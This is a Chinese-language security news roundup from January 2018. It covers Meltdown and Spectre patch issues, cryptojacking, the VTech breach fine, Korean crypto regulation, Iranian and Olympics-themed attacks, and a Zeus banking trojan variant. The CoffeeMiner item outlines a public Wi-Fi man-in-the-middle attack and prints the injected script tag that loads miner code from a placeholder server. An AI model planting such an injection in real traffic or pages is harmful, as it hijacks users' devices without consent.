安全快讯Top News

为正常接收安全更新 各大杀毒软件公司将需重置注册表项

据外媒报道,微软最新针对 Meltdown 和 Spectre 推送的 Windows 安全更新看起来比以往更容易引发问题。上周,这家公司向 Windows 用户发出警告,由于某些版本的杀毒软件存在问题,所以其推送的安全更新仅适用于杀毒软件 ISV 已经更新了 ” ALLOW REGKEY ” 的设备。 正如微软所说的那样,一些使用问题杀毒软件的 Windows 用户无法接收到安全更新,包括今日推送的星期二补丁。微软在技术支持页面发布通告称: “ 除非所用杀毒软件开发商设置了以下注册表项: Key=“ HKEY_LOCAL_MACHINE ” Subkey=“ SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat ” Value= “ cadca5fe-87d3-4b96-b7fb-a231484277cc ” Type=“ REG_DWORD ” Data=”0x00000000” 否则客户将不会收到 2018 年 1 月的安全更新(或任何后续安全更新)也将无法得到安全保护。” 在相关的 FAQ 中,微软解释称,它正在要求所有的杀毒软件开发商设置该注册表项以此来保护客户免遭蓝屏及其他错误情况。这家公司表示,他们现在正在跟各大杀毒软件供应商密切合作,不过这项工作可能需要一段时间。与此同时,微软也正在跟 AMD 合作希望尽快解决致 AMD 电脑变砖的问题。 稿源:cnBeta,封面源自网络;

AMD 彻底躺枪:微软 KB4056892 补丁或导致系统变砖

据外媒 1 月 8 日报道, 微软为 Meltdown 、 Spectre 发布的安全更新 Windows KB4056892 对一些 AMD 设备的系统(尤其老款 AMD Athlon 64)产生了负面影响。相关用户向微软上反馈了该影响的具体细节,不过目前尚无确切调查情况以及官方回应。 近期被披露的 Meltdown ( 熔断 ) 和 Spectre(幽灵 )漏洞给用户和芯片供应商带来很多问题,值得注意的是,AMD 的 cpu 不容易受到 Meltdown 漏洞的影响,但可能会受到 Spectre 的攻击。目前像苹果、思科和微软这些科技巨头承认了其产品问题,并相继推出安全补丁。 然而相关安全专家认为这些修复补丁可能将会对设备的性能产生重大影响。不过这些说法遭到英特尔方面的否认,英特尔证实经过苹果、亚马逊、谷歌和微软的广泛测试,评估了安全更新不会对系统性能产生负面影响。 个别用户声称 Windows 的安全更新 KB4056892 压制使用 AMD (尤其是 Athlon)驱动的电脑,致使系统无法启动,只显示没有动画的 Windows 图标。经过几次失败的启动后执行回滚,还是显示错误 0x800f0845。补丁安装完成后,Athlon 驱动的系统停止工作,但重点是修复程序并没有创建恢复点,以至于甚至在某些情况下都不能恢复回滚。 还有有些用户报告说,即使重新安装 Windows 10 也不能解决问题。 针对这一情况,受影响的用户将需要禁用 Windows Update,但 AMD 用户的尴尬局面最终还是只有微软才能解决。不过微软尚未对该页面上的用户反馈作出任何回应。 后续更新 昨日在微软论坛大量 AMD 用户报告无法进入系统之后,微软正式确认补丁存在兼容性问题,已紧急撤回。 微软官方在支持页面称,他们拿到的用于堵漏 Meltdown 和 Spectre 的 AMD 芯片组技术文件和实际情况不符。目前,微软已经停止了 9 个补丁向 AMD 平台的分发工作(主要是 Win10 的 KB4056892 和 Win7 的 KB4056894 ),正和 AMD 一道联手解决。(cnBeta 消息) 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用户设备秘密挖掘门罗币

据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。 加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前,黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本,将其变成了自己的矿机疯狂挖掘门罗币(与比特币类似的一种加密货币)。 Arnau 专家受到了星巴克案件的启发,破解公共 Wi-Fi 网络,将加密挖掘代码注入到连接的浏览会话中,迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。 Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ,这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。 Arnau 专家分享 CoffeeMiner 攻击方式: 通过欺骗局域网上的地址解析协议(ARP)消息拦截网络上其他设备的未加密传输。 使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁,开发人员只注入了一行调用加密货币矿工的代码。 <script src="http://httpserverIP:8000/script.js" type="text/javascript"></script> 然后,通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时,运行 JavaScript 滥用 CPU 时间,并使用 CoinHive 加密挖掘软件挖掘 Monero 。 一旦编译完成,这些元素就会成为一个单独的脚本,可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由,导致其设备在浏览时挖掘加密货币。 目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS,但是可以通过添加 sslstrip 来绕过限制。 相关阅读: 研究人员发布的 CoffeeMiner 攻击演示视频  Arnau 在GitHub上发布的 CoffeeMiner 项目代码 消息来源:Security Affairs、Zdnet,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

黑莓手机官网感染 Coinhive 虚拟货币挖矿脚本

外媒 1 月 9 日消息, 一位绰号为 “ Rundvleeskroket ” 的 Reddit 用户于 6 日声称黑莓手机官网(blackberrymobile.com)被攻击者利用,通过 Coinhive 货币挖矿工具挖掘 Monero(门罗币) 。根据 Coinhive 的说法该网站遭入侵是因为 Magento 电子商务软件存在安全漏洞。 调查显示,似乎只有全球网站受到 coinhive 挖矿工具的影响,其加拿大、欧盟、美国等地区的用户不在涉及范围内。 Reddit 用户分享的屏幕截图 目前黑莓手机官网已删除了 Coinhive 工具代码,但此类事件愈演愈烈情形不容乐观: 去年 11 月份,专家报告称相同的攻击者加载伪装成假 jQuery 和 Google Analytics JavaScript 文件的恶意脚本,这些文件实际上是 Coinhive 浏览器内加密货币矿工的副本。截至 11 月 22 日,据专家统计共有 1,833 个网站被攻击。 12 月份,Sucuri 的专家发现近 5,500 个 WordPress 网站感染恶意脚本。研究显示该恶意脚本能够记录击键信息,并在访问者的浏览器中加载了一个秘密工作的虚拟货币挖矿工具。同月,星巴克某店 Wifi 被爆遭黑客利用蹭网用户电脑进行挖矿。 Coinhive 工具官方在发现了同一个 Coinhive 帐户被许多其他网站所使用后,对该账户进行了封禁操作。此外,Coinhive 因其服务被滥用向用户表达了歉意。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

在泄露数百万用户数据后,玩具制造商伟易达被 FTC 处以 65 万美元罚款

据外媒报道,2015 年智能玩具制造商伟易达( VTech )的安全漏洞导致数百万家长和孩子的数据遭曝光。日前美国联邦贸易委员会 ( FTC ) 宣布对其处以 65 万美元的罚款。这家香港公司生产各种 “ 智能 ” 玩具,并鼓励家长和孩子们在伟易达网站上完善个人资料。 2015 年 11 月,伟易达承认在一次数据泄露事件中,数百万用户数据遭黑客窃取。一名安全研究人员表示,其网站本身不但不安全,而且数据在传输时都没有加密,这与伟易达隐私政策中的安全声明不一致。这不仅仅是不好的做法,而且违反了美国儿童网路隐私保护法 COPPA 。美国联邦贸易委员会随后介入调查。 受影响的家长和儿童的数量很难估计,但当时有近 500 万父母记录和 22.7 万个儿童记录显示可以访问。然而联邦贸易委员会在其调查笔记摘要中写到: 约有 225 万名家长在 Learning Lodge  注册并创建了近 300 万名儿童的帐户。其中包括大约 638,000 个 Kid Connect 账户。此外,截至 2015 年 11 月,美国大约有 13.4 万名父母为 13 多万名儿童创建了 Planet VTech 账户。 另外,加拿大隐私专员办公室办公室( OPC )写道,“ 超过 50 万加拿大儿童及其父母 ” 受到影响。 联邦贸易委员会周一公布了调查结果,即伟易达曾以多种方式违反了美国的法律,未能按照承诺和要求保证数据的安全。FTC 对这家公司处以 65 万美元的罚款。加拿大的 OPC 似乎还没有采取任何措施。 稿源:cnBeta,封面源自网络;

韩国监管再出狠手:数字货币狂泻,瑞波币一度日跌逾 30%

韩国监管进一步加强,数字货币再度大跌。追踪数字货币市值与价格网站 Coinmarketcap 数据显示,截至北京时间 8 日 23 点 19 分,市值排名前十位的数字货币集体重挫。比特币跌落 15000 美元关口。除以太币跌逾 9% 和比特币跌近 15% 外,其余八大数字货币 24 小时内跌幅接近或超过 20% 。 最近两个月涨势凌厉的瑞波币跌幅最大,跌超 35% ,将市值第二高的数字货币地位还给以太币。 截至最近一次更新,比特币回到 15000 美元上方,十大数字货币之中,以太币和波场币( TRON )抹平 24 小时内跌幅转涨,均累涨逾 2% ,其余数字货币 24 小时内跌幅也明显收窄,比特币跌幅不足 7% ,瑞波币跌幅仍然最大,超过 25% 。 瑞波币去年全年回报率高达 36018% ,但它大半年交易价都极为低迷,最近几个月才一路疯涨。这可能离不开亚洲投资者助推。三大韩国数字货币交易平台的合计瑞波币成交量占全球成交量 40% 以上。 而最近这轮数字货币暴跌的导火索同样来自韩国。 韩国金融服务委员会主席 Choi Jong-ku1 月 8 日在新闻发布会上表示,金融服务委员会和韩国金融监督院正对六家为机构提供虚拟货币账户服务的银行进行联合检查,以核实这些银行是否遵守反洗钱规定,以及是否对相关账户采取实名制。 这六家银行分别为:韩国农协银行、韩国中小企业银行、新韩银行、韩国国民银行、友利银行以及韩国产业银行。据韩国金融服务委员会,它们全部都在为虚拟货币相关机构提供账户服务。 据韩联社 7 日报道,这一联合检查将从本周一持续到周四。报道还提到,截至去年 12 月,和虚拟货币交易所相关的银行账户达到 111 个,其中每一个账户下面,又有数以百万计的虚拟账户,累计存款估计达到 2 万亿韩元( 18 亿美元)。 Choi 在今天的发布会上表示,这次检查的目的是给银行提供指导,而非出于对它们存在不当行为的怀疑。他称: 虚拟货币目前无法当做支付手段,它们正被用于洗钱、诈骗以及欺诈性投资活动等目的。其负面效果相当严重,包括处理虚拟货币的机构遭遇的黑客问题,以及投机活动的不合理飙升。 Choi 还提到,监管层同时也在想办法抑制和虚拟货币交易相关的风险,其中包括关闭部分使用虚拟货币的机构。 韩国连出重拳 这只是韩国近期一连串动作中的最新一个。在元旦前,韩国政府公布了虚拟货币投机行为的打击对策,并考虑关闭部分虚拟货币交易所以抑制过度投机。 除此之外,韩国政府还决定实施虚拟货币交易实名制,扩大反垄断执法机关 “ 公正交易委员会 ” 对虚拟货币交易机构的调查权限。 为何韩国不走日本的路? 数字货币交易在韩国颇受欢迎,令该国成为全球最活跃、规模最大的交易市场之一。有分析师估计,全球约有 21% 的比特币交易量是在韩国发生。 不过,对待能带来经济好处的比特币交易,和日本 “ 情况差不多 ” 、允许资本自由流动的韩国却采取了与日本截然不同的态度。 相关阅读: 因价格波动过大 微软宣布停止比特币支付方式 稿源:cnBeta、华尔街见闻,封面源自网络;

大规模示威活动后 ,伊朗 Infy 黑客组织开展网络攻击抗议群体

前情回顾:路透社报道 12 月 28 日伊朗突然爆发反政府示威活动,且迅速蔓延至包括德黑兰、马什哈德、哈马丹、沙赫鲁德在内的多个主要城市。反对政府示威浪潮是由对经济困难、物价上涨以及腐败现象的不满所引起,这也是 2009 年以来伊朗爆发的最大规模的抗议活动。 外媒 1 月 7 日消息,网络安全公司称大规模示威之后伊朗 Infy 黑客组织可能会试图网络攻击抗议者以及其国外联络人。目前伊朗当局对抗议者和持不同政见人士的镇压涉及范围较为广泛,其中包括任何与目标群体接触的人员。 据 Palo Alto Networks 的专家介绍伊朗 Infy 黑客组织至少从 2007 年起开始活跃,其恶意软件攻击范围涉及到伊朗国内外。据悉,与伊朗其他针对外国组织的国家资助者不同,Infy 组织似乎集中在反抗者和持不同政见者身上。 Infy 恶意软件于 2007 年 8 月首次被提交到 VirusTotal,同时,有专家发现其最古老的样本中所使用的 C&C 域名与 2004 年 12 月的恶意活动也有关联。不仅如此,研究人员 Colin Anderson 证实自 2014 年年底以来,Infy 攻击者就对伊朗公民社会进行了大量恶意软件攻击事件。多年来,为了不断改进 Infy 恶意软件,其开发作者实施了许多新功能。 相关媒体称针对最近的大规模示威活动,伊朗政府还试图通过屏蔽互联网来隔离抗议活动,例如封锁 Instagram 和 Telegram 等消息服务。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

网络钓鱼盯上平昌奥运会:冒名国家反恐中心、意图分发恶意软件窃取敏感信息

据外媒 1 月 7 日报道,McAfee 安全研究人员报告称黑客组织已经针对韩国平昌奥运会部署了鱼叉式网络钓鱼攻击,可能会涉及到财务以及其他敏感信息。目前许多与平昌奥运相关的组织都收到了钓鱼信息,并且相关专家预测未来针对类似平昌奥运这样的体育赛事的攻击会越来越多。 相关安全公司发布的一份报告显示,攻击行动早在 12 月 22 日就已经开始。黑客组织声称为平昌冬奥会举行反恐演习,假借韩国国家反恐中心(info@nctc.go.kr)的名义发送电子邮件,但邮件真实发出地址却是在新加坡。 该电子邮件附件包含一个以韩文书写、标题为 “ 由农业与林业部及平昌冬奥会主办 ” 的恶意 Word 文档。最初恶意软件被作为超文本应用程序(HTA)文件嵌入到文档中,随后攻击者将恶意代码隐藏在远程服务器的图片中,并使用混淆的 VB 宏启动解码器脚本。此外,攻击者还编写了一个自定义的 PowerShell 代码来解码隐藏的图像并启动恶意软件。研究人员分析恶意软件会为攻击者建立一个加密通道,使其能够入侵受害者的电脑,以植入更多恶意软件。 目前该电子邮件的主要目标是 icehockey@pyeongchang2018.com, 大部分是与平昌奥运会有关的组织(比如提供基础设施以及担任活动支持等)。 专家预测未来会出现更多的针对奥运体育赛事的黑客攻击事件,还需要进一步加强网络安全防范。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

黑客利用乌克兰会计软件开发商官网传播 Zeus 银行木马新变种

据外媒 1 月 6 日报道,黑客滥用乌克兰会计软件开发商 Crystal Finance Millennium ( CFM )的官方网站散布恶意软件,分发 Zeus 银行木马新变种。Cisco Talos 称该恶意软件通过附加在垃圾邮件上的下载程序获取,且具有一定规模的传播范围。 此次攻击发生于 2017 年 8 月乌克兰独立日假期前后,乌克兰当局和企业接到了当地安全公司 ISSP 的网络攻击警报 ,用来托管恶意软件的一个域名与乌克兰会计软件开发商 CFM 的网站有关。不仅如此,攻击者还利用 CFM 网站传播了 PSCrypt 勒索软件,这是去年针对乌克兰用户的恶意软件。所幸此次攻击黑客没有损害 CFM 的更新服务器,也没有在早前的 Nyetya 协议中看到相同级别的访问。 在这次攻击中,恶意软件负载的电子邮件中包含一个用作恶意软件下载程序的 JavaScript 压缩文件。一旦该文件打开,Javascript 就会被执行,并导致系统检索恶意软件的 playload,运行后 Zeus 银行木马病毒将会感染系统。 思科 Talos 统计:受Zeus银行木马新变种影响的地区 自从 2011 年 Zeus 木马版本 2.0.8.9 的源代码被泄露以来,其他威胁行为者从恶意代码中获得灵感,将其并入多个其他银行木马中。 研究人员发现此次活动发布的恶意软件和 ZeuS 源代码的泄漏版本之间就存在着代码重用: 一旦在系统上执行,恶意软件会执行多个操作来确定它是否在虚拟的沙箱环境中执行。 若恶意软件没有检测到正在沙箱环境中运行的情况下,那么它就会采取措施来在被感染的系统上实现持久性。恶意软件甚至会在受感染的系统上创建一个注册表项,以确保每次重新启动受感染设备时都会执行恶意代码。一旦系统被感染,恶意软件就会尝试去接触不同的命令和控制 ( C&C ) 服务器。 研究人员表示,大多数被恶意软件感染的系统都位于乌克兰和美国,乌克兰交通运输部管辖的 PJSC Ukrtelecom 公司的  ISP 受影响最为严重。影响数量达到 3115 个独立 IP 地址、 11,925,626 个信标显示了这个恶意软件的传播规模。 研究人员称越来越多的攻击者试图滥用受信任的软件制造商,并以此作为在目标环境中获得立足点的一种手段。为了部署更有效的安全控制措施来保护其网络环境,攻击者正在不断改进其攻击方法。 消息来源:IBTimes,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

CentOS 发布内核安全补丁:修复 Meltdown 和 Spectre 漏洞

CentOS 团队近日面向 64 位(x86_64)CentOS 7 在内的多个版本发布内核安全补丁,重点修复了日前爆发的 Meltdown(熔断)和 Spectre(幽灵)两个漏洞。CentOS 7 基于 Red Hat Enterprise Linux 7,本次发布的安全更新是在 Red Hat 近期发布的修复补丁上进行定制优化的。 目前存在问题的软件包括: kernel-3.10.0-693.11.6.el7.x86_64.rpm、kernel-abi-whitelists-3.10.0-693.11.6.el7.noarch.rpm、 kernel-debug-3.10.0-693.11.6.el7.x86_64.rpm、kernel-debug-devel-3.10.0-693.11.6.el7.x86_64.rpm、 kernel-devel-3.10.0-693.11.6.el7.x86_64.rp 以及 kernel-doc-3.10.0-693.11.6.el7.noarch.rpm。 此外 kernel-headers-3.10.0-693.11.6.el7.x86_64.rpm、 kernel-tools-3.10.0-693.11.6.el7.x86_64.rpm、kernel-tools-libs-3.10.0-693.11.6.el7.x86_64.rpm、 kernel-tools-libs-devel-3.10.0-693.11.6.el7.x86_64.rpm、 perf-3.10.0-693.11.6.el7.x86_64.rpm 和 python-perf-3.10.0-693.11.6.el7.x86_64.rpm 也需要更新。 CentOS 维护人员 Karanbir Singh 推荐所有 CentOS 7 用户尽快安装补丁包,仅尽可能的告知身边同样存在两款 CPU 漏洞的用户打上补丁。 稿源:cnBeta,封面源自网络;